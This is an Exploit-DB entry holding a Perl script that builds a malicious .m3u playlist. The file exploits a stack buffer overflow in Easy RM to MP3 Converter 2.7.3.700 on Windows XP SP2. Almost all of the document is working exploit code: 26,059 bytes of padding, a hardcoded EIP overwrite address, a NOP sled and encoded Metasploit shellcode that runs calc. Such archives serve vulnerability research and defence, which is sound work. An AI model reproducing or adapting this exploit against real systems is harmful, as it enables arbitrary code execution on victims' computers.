Easy RM to MP3 Converter 2.7.3.700

2009-12-10T00:00:00
ID EDB-ID:10374
Type exploitdb
Reporter Vinod Sharma
Modified 2009-12-10T00:00:00

Description

Easy RM to MP3 Converter 2.7.3.700. Local exploit for windows platform

                                        
                                            #!/usr/bin/perl
# Easy RM to MP3 Converter 2.7.3.700 (.m3u) File WinXP Sp2 Buffer Overflow Exploit
# Author: Vinod Sharma
# Download :  http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe
# Tested : Windows XP SP2 (En)
# Thanks to exploit-db
# Originally published at : http://securitygyan.com/2009/12/10/easyrmtomp3-m3ufile-exploit/
#Vulnerability discovered by CYBER-ZONE 
#Advisory:http://secunia.com/advisories/34653
my $file= "exploit.m3u";
my $junk= "\x41" x 26059;
my $eip= pack('V', 0x01a8f23a);
my $shellcode= "\x90" x 25;

#/*
 #* windows/exec - 223 bytes
 #* http://www.metasploit.com
 #* Encoder: x86/shikata_ga_nai
 #* EXITFUNC=thread, CMD=calc
 #*/
$shellcode = $shellcode. 
"\x31\xc9\xda\xd4\xb1\x33\xbd\xec\x71\x94\xde\xd9\x74\x24\xf4".
"\x5f\x31\x6f\x15\x03\x6f\x15\x83\x2b\x75\x76\x2b\x4f\x9e\xff".
"\xd4\xaf\x5f\x60\x5c\x4a\x6e\xb2\x3a\x1f\xc3\x02\x48\x4d\xe8".
"\xe9\x1c\x65\x7b\x9f\x88\x8a\xcc\x2a\xef\xa5\xcd\x9a\x2f\x69".
"\x0d\xbc\xd3\x73\x42\x1e\xed\xbc\x97\x5f\x2a\xa0\x58\x0d\xe3".
"\xaf\xcb\xa2\x80\xed\xd7\xc3\x46\x7a\x67\xbc\xe3\xbc\x1c\x76".
"\xed\xec\x8d\x0d\xa5\x14\xa5\x4a\x16\x25\x6a\x89\x6a\x6c\x07".
"\x7a\x18\x6f\xc1\xb2\xe1\x5e\x2d\x18\xdc\x6f\xa0\x60\x18\x57".
"\x5b\x17\x52\xa4\xe6\x20\xa1\xd7\x3c\xa4\x34\x7f\xb6\x1e\x9d".
"\x7e\x1b\xf8\x56\x8c\xd0\x8e\x31\x90\xe7\x43\x4a\xac\x6c\x62".
"\x9d\x25\x36\x41\x39\x6e\xec\xe8\x18\xca\x43\x14\x7a\xb2\x3c".
"\xb0\xf0\x50\x28\xc2\x5a\x3e\xaf\x46\xe1\x07\xaf\x58\xea\x27".
"\xd8\x69\x61\xa8\x9f\x75\xa0\x8d\x40\x94\x61\xfb\xe8\x01\xe0".
"\x46\x75\xb2\xde\x84\x80\x31\xeb\x74\x77\x29\x9e\x71\x33\xed".
"\x72\x0b\x2c\x98\x74\xb8\x4d\x89\x16\x5f\xde\x51\xf7\xfa\x66".
"\xf3\x07";

$shellcode = $shellcode."\x90" x 25;
open($FILE, ">$file");
print($FILE $junk.$eip.$shellcode);
close($FILE);
print("exploit created successfully");